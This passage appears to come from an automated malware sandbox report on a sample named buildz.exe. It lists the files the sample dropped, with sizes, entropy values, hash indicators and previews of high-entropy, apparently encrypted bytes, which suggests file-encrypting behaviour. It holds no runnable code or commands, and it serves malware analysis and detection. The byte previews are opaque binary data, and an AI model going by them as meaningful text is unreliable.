                        Preview:<?xmlu.;....G....... .......>}.|....X..S......`.......s.u'...[....l.:...GP7$L^."..^..@..'.T.<...U.a........!..i.....:). .q.e.'.RPV..?.G2aJ.....}Y0-..z.....3`Tx..A...x...C....iz1.....1..u........V"E...{..xg..j..*..=.?....o.......stKJ.u..;:.....V?..@...;....F.<........e.....d...N.E....}.#.0^-?..2...`.$I.=....G.1K ..\..........l.^..o.H.......?.......{.U.s.E$...kT.4.h....7...%....HW....xX..o..<..?.........M..P. `~?..^)6=..P...$.n6...3.m..jo.....d.....)Y.A\V..Y..&`:.%.bK_z5zb(....W.{......fq&.......HWz,._.i..!{E....D..6t.c....ag.&..j*aG..)?..E...d...+.......A..Yw.....!f.. .0...(.#B.v.Ad-...(E9..../.0..dH..L.....T....p...q. B....'....w~.../5..W{f..o......Ik....JA\.6...b....j.I.u....3j....6l.z~..#:p.......RV.r..m.t..%.....t.J.;#t..P7d...q....h~..B:..{.........6b..b.....$.BcM.23....E...|.q...+|....`H..Z.$L..y...+!.....*=........3.c..P=...m...3..........Z..wWto..-.N.G.x....(.Y..8.X.Z......$...p..~...s....`..sr....(d...*..hP/:...F.g......9}.nH.7.H
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2405
                        Entropy (8bit):7.923477058899395
                        Encrypted:false
                        SSDEEP:48:rlDwB+R69Z+YTgo13a9JGw+gI9gx7qedaYu9I6e4aA39DNTBnUD:rNw1fxTJ1qj6iweda7y6eRgTTVA
                        MD5:2AB2F6F7BDE267EEB95326C78EF68C3B
                        SHA1:E8F07F85FBA9DC424E8052EB78FCA576BD93251F
                        SHA-256:472BAB4062D1D5C3BE1E04E66972643D2713B29505F4D74BB647C93ADD04333D
                        SHA-512:3758BB26460E044C9BAAD6FCDA0BAE051595AA5143A9A4E99AC199C677520590C1D110251DED9E2FC5E473183FFDC493B71F368C773F5546DDB39EBC43676ADF
                        Malicious:false
                        Preview:<?xmlE.~..~.B. q,..y.O..)...<.&(.}...'..\..GP.?j...udEG...Z)...... [8Q.v...~..},XV.!.............Z...wv.s.1....&j[..u.?.%.zf.?i.A.Y..&42.%.a..f..7j+.u.6...dc..E...1x_*.....O.`M.V..]..P....mt.]......'..3l....~I..SM....IH.o.j-.9j...N......[.....!.1.............d.1...D..F...].oZ...N7`64...1......8G.P....!..8Zq..h..J..rf....._......98zq}...).....y..k.-..E..5 .....a.....F4V..g.........N.h8.h#N.........E.'....u..G..CO........=.E`.......B.G..*eU+1...8w.....7.....6.:X6.Mu..ccG..a.........Z.w.........4....._3<C&:v.........u2N..W...ly.......Mb.................,..\...JVs...wj.YX.tP.{.m.3.."zt....nW2g...{...d...E..-0..WY.3...>..H..,.s.....A$4.[..M>-.w..W|....X.......F.....zg[..i..H...b.....UY..(q..|G5..0..OM...^h...3|.>...O.rP..j=..........L..J..a.... ....Z3.C.$l...\.4.w.R.w.7.F......S...c.i.X.F.vYa..o.d.....O...[k.z...']{R.>QM.qu.bj..O..d<..H....S.+Cxm6.......g..e%-..[.c.@=....u.`_.....gL....@....^3C...^l,..4>..^...D`U`..h...c/.(}/TO......F.9.O..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1358
                        Entropy (8bit):7.8471879208099
                        Encrypted:false
                        SSDEEP:24:gchKlcGWZoGqZepkI/TEcwc8Fri3BiOFhJzJtd508eGsPIGiYqgiG9VgIoMGbD:Z7oHAT/Ycwc8JqgQfRQjqnEHUD
                        MD5:E6A59151B99169F5CEB47E18861CBA8B
                        SHA1:C85E7A6A7FA2632E48557F58E3B4DECCB5B1A956
                        SHA-256:74CA85D8476D2081790005582B75390D91F22E63ACF0718C46EFA3649BD70D91
                        SHA-512:DF95535ADA5ABA3544D251244DCECCA4978FFB59B22E498FA2503E817C4BE998AF9E1164C31D14C115183D25896F2D48CA6D2364077A8D118E6C169C69C81C90
                        Malicious:false
                        Preview:<?xml?.E;...I..5...(..,1.TFiV..Kk`..V..bfP.,.A...!.....n.V.j:W......P..... [.....,..p]....._fu...+...YT".q.VrM.)ai.......dC8Q;R.R..b...6......^..hz.yz5+.<)%.H.(.Fu./.9X.>@i).......*N....[..%?........./5 ....|..9.C..b...T-;u8.N...g.....4m.l..O.$n.g.)0.}5...i1}..F..@...x.7j.k.....!.7|.Y...yn.N<F..|S'..k..K.!.}..d@..........>.X..A`{.Mj.P<0..........Mo&O..WX..d!...:...].{.b...*..8.6.p.=]%.`.O|f...-..9.}......H...u.3I...Bc..$C..k......A6...y.QY....]....9..N. Q..h.j..h.(.y.K..@....7.9L..(4.(.........:..`x...s.......M.el...o...n...Q.r....w...N.......F.a....)..tg.>.._..m.<>............R*..o...\...>S.....7;.,.e...{t. .B.V....tl.?....*.b.$..N....".A..L....JK..1?.5.#...,...g_,o&Z#....'.....8_../Em@*.+.U.......g@"?..C} ...&...r0..5V<.{.yPD.).a.M...P.[..<..y....b..B.|.....`......g..On7@.IHP45M...4.\\.."z......B.?...t.s...`...z"......K.|...+[.|"..L_.......9.3..P...'.Y....i....B.vX...h&...xz.>:.>...~.=...t.......N.w.0.g.....2.....i.|.Q.w.l.8..m...v....cJ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2416
                        Entropy (8bit):7.911342800493269
                        Encrypted:false
                        SSDEEP:48:wDbSbptWLrFffndXcQHBWJHhaov0qalI2xjRsJceq+su0PsTo98aWYP/VUD:wDagJcQHsHfcVK2vsJL1sNUTXaVVA
                        MD5:8B9865805CB2BF2D95CEDC187EB54061
                        SHA1:5AB3A9C0D776D94C3C085D32FD758B488FCFB2F7
                        SHA-256:65A01039AC34F8A04A11664C843369ED026D7B8CDE09514218FAF98CD297F5D5
                        SHA-512:730DF3011F1277E0262F7497B76221EC2CD87E3A95A805B2A591B9FD6C6EABC5B5C5381AA281EF086B272A04EE3F5B1DE223707C5E8662CD4650EBBDFCEDA143
                        Malicious:false
                        Preview:<?xml...c.............M..0e.9..e.....-).Jk..<o.N.S..../.(><..W.B..<M...[yD....[.:[8.:....@0.....4....."&x.x.d;.t<..0.{|#....o....Qc..0...~..i..@L.{X.z...1.C.9.Eo..o...dZG.-J-n#.M..2b..#.YT..>".....X.....;+/.7..T........(k.$C.S....h.3.!...t.K.....e!%.-.%.5.........T..rW..@.*..[C.i....-.A.W`.....Y...z.f....2.#z2....8...._.C.`[.j.rF5......./J=.A[+.o..M.p.}{.a..v..*5&. ...../...P.....1.P.C...V.....|..)..L..Y........<..Pn4..H..K...9.-...%E`.g.....CAU...(k..;q.}...:........Z...*...,J....j........0.G..i.a/\P..b.;.............w.......KZ...@.}4.f....=.x...#.....?.e.-.#~.QC$...*8..*......O0..I.._.3.4T.)./.0n^M..|..A.,.ebs-@R.F.)...w..y......V..^.4..ifX.}..9__P.m.J.&;1q..*...\f...V<.........fC.aELiv]C..o.+V{.#H."..B.ZR3.F@(C...T5..}.y.]..W..5...$.ih..D..kE....P.<.O..d&0..y8-oX...y..Js.....+A..rqS8.p...^[&..K..B@A.>bG.t6.-....k.E.K.n..~.HP....'nD!P3..ouf...a..~..~ea+...MaZ.D.)....`..i......)...4Y_..sO_.sF2.<p..g...$.k.....'E..`?7....dN...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.859246557402013
                        Encrypted:false
                        SSDEEP:24:EyQ273MWBGB/AVtGzTFr1APcijqApYHxXciWXxDE+tfcZV+GbD:Ev1WB6QGeXVe1cJ4+15UD
                        MD5:3A47B61C0AA1600B6CBA43DB0A1CBC61
                        SHA1:362B9DDCEFB8982621F89DC61F474461AE5C8253
                        SHA-256:F76063C0CDCA90B3950825B7CB38CC7E3AF2400C927F85EE473BC8DB351EAD10
                        SHA-512:7534CD57EC62E2E1D48CAEAB9D38775DCB251C56D82747A4F257E14AA8A831E7F952A9C44ECF8F17040198AD8DAE3BDC4D7C16C2C2BD77D9BCA7ED79FB943AD3
                        Malicious:false
                        Preview:BJZFP..5.r<..0.....0.$..}..m.,.qRH\.8.BvW....{B...T.8Z.G...\.y.........=d;..l.P.......b.3>p.aV......>.&... .Z7....6B..|....-.....E...}L..q.m.....0.i.88.8...._....!?..?..p.q/...M......R....S_...e.....~......Y..{..r.4<$$...r;2..N...!....W4..3.)..Awl7.I.........{.....N.&......8~1)...Gj.i...IH.7.]V....vV.. ..b=0).I.|F.]p............!.]-.....d......p..7.I..[...g....v!.mL.xuiI......2,.....W.3^..@...........5*gk.6Y..u.....(...t..4[.i.}..HT6.Tj9.T.0.....>.......(u.V...C..B....m.R.....*...a.qq...4..........Z....dm..Ak\.Bw...H..JP....d..*.~.(.......@..rYx&T.u..H..V. ....V.=.@H..i........c..sz........Y..F.ry.x.P)...'..Z.y...."f......y.....'0y?......D\.q...8...b.......G..P.......'.;.7T.I..,U..t&(.....a.........&.S..2eR...h.H@...v...)...=..<......C..m.@...t|..6......Y.w.$..63....3(...n..@....}.N1....o.!............\.7.M0..m{..A......?...x..HH..3%.....z..%D.clZ..%....q.Ei..z.x\.......o.....\.*.qpB*.O...5...-..D..........R..d....?!.3..=. .2..d....5
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844488245170731
                        Encrypted:false
                        SSDEEP:24:Q5NGRVMoGCZl2FKKjsOTEv6r8GOlMhDK32zvy1uST3zI2VZhtYGbD:QgO/zFpOehDK3Kvy1fTDCUD
                        MD5:07BD1F4F4BEF64A85126F4F7A008F6F5
                        SHA1:4BBFFE09CC3C006356A846295A5DC9F7C75F9D5C
                        SHA-256:A36BD78581A4AEC46EA746D1FA735E5DBE096DB9C6FC7539BA1AECE4ECEC2FD4
                        SHA-512:7764C455CA2721C69B00F184F1542DAE58DAFE2E712BE003DEF3B85324B473AD75D88DC667C935845E861E5277A1CE28069586DE783B31B8DE59B1633D7E8BC4
                        Malicious:false
                        Preview:BJZFP.u.......O...\.I..@C.g..:V....*"{tT...N....R..H..#...F.c..y.@;.z.wI1.}...h...Nj....)4.1. Z.....;^...v..F..}{..H.Q.n#$.}Jm...q..yQ.v.F.....!.)Fv..7<.....lYx....|P..T.....o.l.'.K:.....[D;.b.w.w10.....u.......^.n..._w...G..c..l.:..W..W.xJ...[...%T4.....V..N..]...#.2...k....".....U.9..}...sU...r~a. hZ.s.7C*3.F........6T..|j;.....(y..+.&R...0h..M.M.0....Q!`..2k.?..#......I.i.\...32v....|....Qpv.....jkr........1.J..... ...L.......IS...+.~.0).g.!....a.BZ(..8'.e.2..a.<.....WB^a.C...................).....p2\c/(..|..fI.e.........5.l.=..F...~..p....h`K. MpM...`...0...-..q.'..:.qr...yk.Z......q.>........%.P...I.....f4\n..~.<.......D.uF.3.`..W./..8..`(...G.caC.._`g.a.K]=#..>...}..K..x:8.e.a...Kf....[bh...............?].....k..!F...:.q..2....Mh.F..*.Mt...x..=...r...J.Q.Q..=.z.1'h....h.+AO-.. ..u.a.l....I...2a{.I..z.w-t*4M<3./.....C..r.'.......z.Ak..y/..,'6i...Z}......M..K.."E.....+\l-mw.MK.>.j7.H...u..f.6EMo..v....n..Cm..;_...D..-[c....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8460203161185875
                        Encrypted:false
                        SSDEEP:24:w3xcBdAwg5PpHGjcG6MgHJAmR0zh22tdsgz5KMwSqFyiJjAujkr3OmYJlw/Y9e1g:nBdAJwcG6n5whNtHzNcj2Om+l2Q0UD
                        MD5:9ADFDFAAB46B4D112E0C08D55E57A625
                        SHA1:F20479E284CF352150D85D22289DE3E7C66F7B8B
                        SHA-256:B27466E8A94FDB18211952359BE10EE93D59D0157D2D66EEBD7A523CF0F4B310
                        SHA-512:A9DC457924599F21B84BF6E35B4B1211A797F9FB82F6604C600C01AECBAAF80517CE0897DAA72DE3271CCB7DBC8A1DE7FE0341C3F50F823EC057930B1B21A61D
                        Malicious:false
                        Preview:BJZFP./..LX.).q0..n.Tf.6.o.......B..5..L.N.{_......:s]....F.TGI..M........Q.}...X9N>.v0%...x..i..}.SW....../l.8x......{..WC`....p&..d..>.."=...I]?....g.h..~..l.v.=...j:.A..=..&U..........t.'.T.!.........S..........qCS..........&...}..5="b.reR.y..l...&k.?...8...R.v..w.........>.....-..i5.......Tz.1...z.K0^d.~>.f.$..&..t...7.'.N9q8.c..2@.8.`..>.....b..o..7..}r+.ey{x..B.*g.8.*.iD....(.... g...~4=..._.6..L.f..2.).8g9.h..e.......J....)....d...@7.L.>%V.Y.....m..T.L.M...*..rx\.SuWS..o...L0...a.@.}..R.hi....ej...OY.q..gU.u..a.._.L...K...9.tz...W."qB...].-$71.....[...I.X.?...L..3...~$9....{.[.Jh...Pp...9.(.*-.OA...B...0]71...T..|.69[.l..q^&..3..J..:Y..s.......DK].R..z.T...s...V).........#.KV.E4.4z..>....^..M..wm.0i.....3.:#.x.T.wK7.83.Cy.R$....L.3..ej..#..._.&'7....L.k.....e.Y...b..c.<.|..*6..,%z...A..........U....4....w.fE. ...e..0.....0/.Q.>.#T..B'.*.-......V.w..C..e.%]c.V...Y.+.!:...?.tU..p.a..nE.VJm.0fA..Rr..Y..a...d...EY]....><.<.|...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848869969754525
                        Encrypted:false
                        SSDEEP:24:CxYqiFed8RLC0PrFOxE/QfYDiyYc8Jom/8FiXQX6WT+GbD:CxTORD5OxEQJyYc8W88YXQXqUD
                        MD5:B7CF6F9E275D2F8DFB055D9184ACB8BB
                        SHA1:E3B0562B891E1F306E752BD86D2F7D9B808D8C03
                        SHA-256:672B60E43570B1B796AB6873B93AC8A4ABDEFA17EE00D9883EE2BC19E40E51E2
                        SHA-512:619186C91A6EFC5E9F6CA8DDA49C9399E6A25A65EE859698680A1A8FE7521B15DF8DECD6EC530C2019F2A04F78F5D559A789D41439F61FC1A067431CB6C0BDD0
                        Malicious:false
                        Preview:BQJUWq.~....+[O..O...h..o.'...@5.p..R..tE.}q?6.*.#)....+.u......=....$.?..p4-9X.^.7..\..cN.Z...).....B... .,...g1..l.....)X.u9.?......a..._.{WI`...#...u!...N.....;..7........A..D.Q..Q"'~...$../...H.....OG.nP...p....J....Q...~..1B+.ie.\....I.7j...%...m....2....K.+...X.....'l+.MT.....F...m.vF|..o.......Z.w..t.c.iW...V..'9..G.7....1N....L...f...]7.Q..MF.g..v.MXFs..yV~..W..,+.OM4.0....Y.M....7..L...@.Lp..fU\4...qK.\......~..+...Z.>...p.......nJ~...+>....#..X...=.....;..^....}._)..t(u.&.lM,..2m....g.M...b.#..L(...1.]....\.=...<..)..q..O.[.T...M3.-V.@)(.#..`..s..#.b...eh.J.&.!US.>.}%.......r..,.UQ...1..UI.#5_[R..[...|.~..X...'T.......s...O|...U.X....P......D.....'(2=.}..\.[....;.....{I.qW....b.J.\............g......O+T.lkq..ti.K..*..4......^.\.s.vc.<......p..j?...b..%-...I.yK...)k.....:g1\...q.!.2b....t........5...y....C;.sK..-W....T.u..~..T5.....Z{..a.7.d.ZvsR...X......:......Gt....L.=iG..j.K....M..Gj..Z].%...k..,.."...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846575970833408
                        Encrypted:false
                        SSDEEP:24:3SsyKWiLgPiz/xisGgtiBCz7MBLYgzI+CJEXu0aCrDcu8X4j6C1KyKvCbGbD:CsySLgP8xsgak+kmX5rDFlTIyUCbUD
                        MD5:323B40B2A5C6B25E64A121E4B6FB02B4
                        SHA1:DF8DB7F55AE0B4575531DC66DC9D48E17ECF64D4
                        SHA-256:9A7043692B1AEF249D3C5AFBF5CF1A0B9B4DC57DF968670A882D541BD2C83DB9
                        SHA-512:99E6F1A6552B00B1FDCF9976074096F91C46FB3C22031E826C3AFD0139C3E68D21F2A6F687C448EC628CF8212BFB7F4C03083AF508C3DE027883E8EE0D94A56A
                        Malicious:false
                        Preview:BQJUW.,=..[.E.=b5H:P^J.......6=r4.5e.[.c....Pf.......`Q...0.fB L.#?.T.t..7tB........^.p.f....(.&.I..ep.'..>A....wX&..X...Kw..O..<.5....6...v.N.=X...r....>...t..wDy..)JS....{...[..:HxUI.7.,K1..gtD.el....Z..^3.G..~.t...~.J...G..2HE.>....,=...b..b#..qma.@..A3tU....(..|.I9.&?........W..Ph.5.X.~Wm...Y...h...q....a...[I..1..d.f.;.$.~%V...G.....]...d...{I.k..'..C.F.~o.=.pT..F......r...q`N..^l.....Yj..B..!..!..-...7zq........!... ..0.V....a.)?...X...G...D..G...w..4i-.]j.#...\..oL....>..^.."....7fXM....[.b|&..x... q.c.@G.|.K.ZH...C.....i2JK.....'..1.N..=c..3.U..`W.........nb.Y...V.zPP@"..J........uS.|A.:X?-...Y`..P>?SA......#Zb).;UU.U%....7<......*..:AN./J&.].k..`.....T;pg..rY6.'........MAt..\.z...r&...C.qw".....s&.....\0..W.]....AcU.....-...s.(9..rZx..a./.Lgb@.f.K..g.....M..r#Nc...}......8.....^L.\tkn....G.:..n,..]..p4.J.....d.....qy.......$..lK..K#?% }5|.'.P_w$.*..ki'...@....v.X6....7...M.J.a..O.!...d.....v..D.......P8....k.vH..;JB.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.842955193790449
                        Encrypted:false
                        SSDEEP:24:RZBjEWDRKhKCeoDglvvDYKbhku8eYtCS8NAHbwkJGbD:pEcOR/sNv/bqttCS8NA7wkJUD
                        MD5:606FB99EC82948B32E00D0353481D707
                        SHA1:BB15EE1C4830A5C322B366A6E93EF6F550467852
                        SHA-256:012849A581F125FC2D39C0AEBADD0065BEED5898A757512A8F0055739FDAC173
                        SHA-512:6AB60A0309F0954FE0C7F8ED333BE6F8AA268A908FA092FB4D2FB0312123DF95370C0385756ACF76F87BE54B19878798F5C6A22CD8A83E03CBCFFBACCBA3BAE0
                        Malicious:false
                        Preview:BQJUWI.......=.I=%=.R...'3...rS..d...L.........W.N.3D.e(..q2..'.Dd".F8>.......'...&r.O..;.(.q...3...tlQ!.{. .%(L%3n`..Y..*../.b..w.X#....%.c...+s.....$..6.DR.A.?.-V}b/..W.d....I.....8w.&.=w..O.(f!...Or..B..w ......3.....fNQ.*.*.3........0....HMEY...v.Z..t..N..1l.i...-.;.Qy...Z4..F,..`...v9A..*...U?.>W...I.....!y.:Yl*h.n..8?..x.i...E.;.[Tc...YV.K...9..9.=..o..VV....8Gg....w...8')....5.....x.$...:.....-.4...G.Z.t.^jA..Q;O.8...j.O..e.:.l....((..'..G..x.Y.9m.ke. ..p...m/.....A...1p:....V.N&......,..{.\..b.li. ......5l....;.......-.=..o...W..H.)'....m../`/.=."...5...,.1X...n........C...)..... Co.:+.._.....`..5.....;.qI.f.v...H..O'..A..y...=p;..jz.....d..z.J.:."E.......F$.......}.L5'.L.$0}....\G.0.>.{.ErD.`/K.{4..8av3.7.EV...7.).....#$...b..>.1.T..a....6..1%..m.....2....I.."..1cY.^..3....S..)..v..T....{J..FX....2..0.x..]......x.88.....1~.q`P..V.u...;.}.b..k]#..'..`...k9...D.l........o>..{. 'ytv.`.^......k=...Q..!-.w)e..t..(^....c..g..x|...%u..vs4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.838941610991017
                        Encrypted:false
                        SSDEEP:24:kw0mxdGJb4MrZ9ttD3Dimdqc/eZQgJwhhVFueKAcGWELtb6cO0JA+ibi/LMbifGX:Qmxmb4Mr3zHimdqc/RgJweLAlWEB6cdA
                        MD5:24E6DEA4886EBE38EE1DA9AB827F7D4E
                        SHA1:E5450D3D104380364544E49E706ACCFD7B400A54
                        SHA-256:BBF9155ED44C07CD7FBFD2CC603D1AB61CDF35E5A76235CEDFB1A2F27AB7A02C
                        SHA-512:E1644149DCD50E1C035547AF8DB53F7B709B4BC3A1706147ACEB1E7E729279931F00D569093E73637F40050DAB4F11E85908E62AAE7477207E4B7CDFCF63AF66
                        Malicious:false
                        Preview:DUUDTU...g6..V...O}.C..(..-....i).5l....*.H#.T..B.$ S7Y.\...T..rB..c..b.YA.VP...C.].WZ......<..MZ.......p...J.....l.F..&Xv."..#..]..v..8g..Y.s.j[.7.|.i^...y..}L....w.......:...0....5f...`=..P.;.....w7....o0*.&.....?E`.Uw._>.,.....t.^$..u..;..R4R|.....H...e.)...=..*+.&#+34..1.$ZGc...[w.....x.]jFPI..|e.........\.Q.dc.3.!,.M.F...=g.................S...._..N...^bGDX .~.7g..V+&.5.0=.?....9.<(.,W4....O./...c..Z.Z.Lg.....o.........Qo't..y+P..V....r.....t9.b..n`..;.,....{...,5....t}CL#H..UT'..U<}..JG.hU....dD..{...Ij.?./1......a...9....[r.......m.L.L.g..@$.8..w......j...+....M.)'.....b.O.....4....G..K..T#....V.[s..%D..D6...M...h..<.!VK.........q...,..3.....T4.....8S.yU<O.vxK.qj>...L..`....s.h..)......~.M..a...5..`....7.$..e*.7!..y1............P..!Kw.O..P........!O..h.2V.x...@..U..JH_......<.a..P......N...lT Y..7..4.d..}r.Su..i.gq.]O....j....&..y?B..;V..Fq...h..9.C.l..]..|.a...0.N..=..`v8.b..J.C....q..L.N...C.+.....H2... /()...#)d...dJ.....^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.842742783264333
                        Encrypted:false
                        SSDEEP:24:ll+wGkBZQthTzT4MTg8PlE4dABgSOk/YXPZkSvS2Xm/JcQNhMmae2CDGPzvGbD:/qkBZQthTxxxdFSngZkSd4tNlae2EEUD
                        MD5:97CD4AB5C0FA7DCD5AA804A33AB1041C
                        SHA1:2A2E91B35C4D83335504E713C45FF06DFA917379
                        SHA-256:DF2E69BD17A297745AAF8624F8267F086F3A27429D72F96B4368922F395A1A16
                        SHA-512:7F8F9518062CC5AE6D0A46C6E3CD10102748D0CE732BD7614E97C248FC698C07B0B67424BBC069B4874D34B3120A99BC432D4B7802DA7F9089E4FC91409FAA33
                        Malicious:false
                        Preview:DUUDTf.yBg....$..9..E.z.....S.U(F5i.....b........k.t.y.W..X..k..sn.ek.&...%..l(+....`.!..E..v4.....X...1s.....e)....*..&...?...cC.mb....b....5.j.....G.}../.BRS.FL.....m.5....{.Pa...B...W~ ..Jx..HHH.......{..'.=M.A.yl...B......3V\C.....kuY......Q..(......1($.8_.....72.w..v......i.{H...{...-.h...F...+..7.'i..OK.JA&rl.s..N......q..W.l....\....C..RW.E..q...0i;..\m...X.b.......,y..M.WY%8l.....AW....b*...2./.?.Q95]c.4{...lcUfWW.].`....5.I....@.Kq....I2.V..km...O)f......rT...@wl..;M....S......=.....u..~....:.....XP.2.........U2@..rBd.n.....+..F.Y!i.,..}g.T@.M.h/.e..^2k.....L.V&/$..kT"..z.{...e.Y.....?.6..p.o?.q..{..p...-.W..q.XG...a...g.cw%H.......n@.#c.<...P1..6.....X.w_.##w..$qO....V.....+.. |.C.........V..6'......R.Jy.....g,XM./..%..WO......:.lG.e.R..:].X{}..Gwc.....>.BY..EIx1Sj..D..:.,>.So.Q...c..0.....(..dn.0W.t..h..;P........(..z6E}/.......'.OwT..0.T....N....=..1.~@.y_^.|.....ul.S.=F.sl...V...v....a.Z.m.}K............'UP.|.c.Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846714345874276
                        Encrypted:false
                        SSDEEP:24:Fa6rsb4DhwFhFnJcM4SnxCVgWnvvGVC4nwo2gI1VUvGzdNKA92rQXDuEfLfiB7GX:FtC4D+FnSMEVDG84nlHIs+zOA8rQTuEr
                        MD5:A3A964AFA1F7F641A0313C5660DAFA14
                        SHA1:C3A1E81E05B467CDAE8CDE17F08E8D2BD072216E
                        SHA-256:9D064B5971BDDC3DE6FE1835B380233FB034BB98020BE8FCFC01C38B4F0F8947
                        SHA-512:B67B2CE1D23AF8112BE385BA9FB5698B526B9D156BF600E08984A1E7956AB538BC32235CC56E1B38FC7A089D59D9FE93BE94ADC3F8BC730EB3351DBD9E40511F
                        Malicious:false
                        Preview:DUUDTXW.2...;.R..R..,.OC....8.B.\e..S......m.Z.....#...e..= ..I..._.jG....x.Y..,.$.....^..]..DP.}uO2..<.6P).+.S&.E"Q.ZAn.|.WM|d.5.R.0..5h.dR....._...=.9.....;.....8.<...T..%...B!D..a......=.5.|P.1..T.X.K:.8......,W.<oc..W.j.V.+.K].u._.U.?.w...M.w.P.'..r....Y_.......!v....{x...-...*..&u>qi.'N.f...3.......g....HW.T.........>..b..&..3..D...7*.......9.^.xl..M.M....0.@.T..w..:..TKT.b.(.......57.W. .cm\4....d.....}.y..SV..."....-.=.;.*..7...*..Z.x..9.>.m.X].....yY.o.:.}.w....`%...Y..Q5.!.jS.t...{...i!.(g.\!..:d..s3..P..[...:.0A&7.],.Bd.l......ki...m....G..(.s..>t.kmDq.`....|w...T`...~.<v..Q_.&-..*.G.:..OFt..[(r.*. ^.E..Q..F.|.#...9nd...-s...A.E.%k..*..S....`.Wu....X....L....#3Jz....9.D....g..C...?"Qx....G.\..EExn....6.....M......=.....p..c.Uut...B......."512.)..m#..'..;..kg.9J...G.q...........3t..43..l...f.&1.w....G..Q....k|..).@|..&...0..L.......BMk....R..T`.I..P.kx...#.....Y-1...........`E.q.PG...ij..R~H....F+TL..+....>...09...].....U.4Of.iJ..<.9 ..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.861008768464821
                        Encrypted:false
                        SSDEEP:24:IILgCeeXeLxpFlCKhDyKGdRq0RoNJnyrwSXyXzZaOsRwMbH4eZNAA6GbD:hLgCeeXeSKF9m00RYNyrwXFa1/ZCHUD
                        MD5:23F39E8635ED6D1BEE9A44971D873804
                        SHA1:5D3BFD9C4F34A4295A462A2409C7606F9F19E9E5
                        SHA-256:BF78BAE5AC921B01E2F1B8BB7D775B5E75771A2D6D707ADFC652B9C5BD1ED17A
                        SHA-512:B446948476B951037AE9B5F79894E403362AA2087997BBE615C48361DB4ED1E437E653B5A706EB726F8134A2DA22D19D1098D4502E1673265C056F45A91EB82B
                        Malicious:false
                        Preview:EFOYF.9...Kg.!.'....[......S.'.s..D.v.^.._[._..{.;~.,...c..........J..I..............G9]...~.s...8..=...y...k.c....z...].6...nx..-..O8%......R.d..x..,.n9"........S,....?|....t.#.!?Z.T...3..*.FuK@......"..6..h..GdM.D>..@~.@.im....J......m#u.$~..P...8$C{....x.$....DyMi[K0.x...V.|>.HD.r...}..Y.)"...#m......V.H......P.I..&\.....4zH.2...+@.s.f.M.y8^.8..........f.-4....4."p...*G.]_..J9/tP..%pU.|........mz.."$..F.`...5.%.)$.;l.I8........"....q:.vz'"~.zw[OP.Tl.M.%.5...a.\.8.eQ-w...@.....J.6o.b9s.v0.(I(vj....N.b..*..m.g/j..t..{.......^E]..*5...0..1 ..Yd..........'|.....h...]....A`........^.......m...aZ~$.i.!fU...C.=.?S...8.......z....D>..n....cg.SE.e.V7>.v...N.....W.{..N-Q....wH{......kz.o.....2.O....'.3.n.....4Z....\.c..e.Id.*@.....`...*.L....?B..n....rn...33..\.lL..[23..[n.Eww.3.....Q....x:.#P..L.....J8..,..%..v.E$..b+..7=E.D]..=..,.ML.(ue....cH...-~NM.d.....V}"...E..t...s."...../N.@.V..!..l..PJ*;.u..'..g%.......Z.u....?...Z....i*^.9.B.{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.836402775678312
                        Encrypted:false
                        SSDEEP:24:huvKEy4ZSdDgd59wJWD2Gllr9D31XpNlgrLRbqtYKO8QmCnYAxGbD:huvvcdDgp2GLJppNlgxbqt48PCYCUD
                        MD5:E46D473242BE18A792E1AF4B6AAAAB21
                        SHA1:F4370045756016549AE078C47C1B7DED4FC9B95E
                        SHA-256:6DF45D3DA66E187D4164CE819E65FBBA6D68B2298D5E10E8894F7FAF8D7DD460
                        SHA-512:7138C9B93753F9015DF82644468F9D16AC51BB224C38F047816BB4DF9967AC166AFD2BCF4524208665AF3EEDF21D5F52766C2E2B2F4A70C706AB6977924B991F
                        Malicious:false
                        Preview:EFOYF5.{p..l=r.:y>M..;.zf..DPJ..Gk...VAC`....q.9.F 4.f.S4I..j....T~...w`A4..P.-5..4.Zg.ru.D.BS...5-K3...w.L...#F.|H.l..R.JY.V.W.....-.n.P....G|mY$.q...v/{..o...3.I..._.i.IA[..K.4.*r......0p...T........zB..y.4.......,.ZE...zw..'.q...M{......0!.&3..;.I..".............p\^....L+.b]....n...yK.@.......=_..&..N..C?.Y..^-..A&......C.b..C...3E.....x. 